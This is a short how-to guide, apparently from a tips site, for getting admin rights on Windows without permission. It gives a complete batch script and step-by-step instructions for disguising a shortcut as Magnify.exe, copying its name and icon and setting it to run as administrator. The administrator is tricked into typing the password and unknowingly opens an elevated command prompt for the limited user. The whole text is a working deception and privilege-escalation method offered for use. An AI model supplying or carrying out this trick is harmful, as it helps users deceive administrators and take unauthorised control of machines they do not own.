This requires you to be able to write batch files.
1)Choose an innocent .exe file, in this example I will use magnify.exe because limited users can access it.
2) Write this code into notepad (replace
@echo off
start C:\Windows\System32\Magnify.exe
PING 1.1.1.1 -n 1 -w 1000 >NUL
start /MIN c:\windows\system32\cmd.exe
cls
exit
3)Save the file as anything you want as long as it is followed by .bat.
Under where you wrote the name you will see a "Save as type" box. Click the drop-down and select "All Files". Save it where you like.
4)Go to your desktop and create a shortcut to your batch file. Name the shortcut "your innocent file". So the example would be named Magnify.
5)To make it look convincing, change the icon. If you want the same icon as the original, right click the shortcut and select properties. Under the shortcut tab, click "Change icon". Where is asks for a file, enter the file location of your innocent file. This will give it the same icon.
6)Then, also under the shortcut tab, click "Advanced". Check the run as administrator box. Then click the OK button.
7)When you try to run the shortcut, a popup box will ask for an administrator password.
8)Get the administrator to type the password. They will think that you are trying to run the innocent file.
9)After they go away, you will be able to maximize the opened administrator command prompt.
10)Enjoy the ability to use the admin command prompt
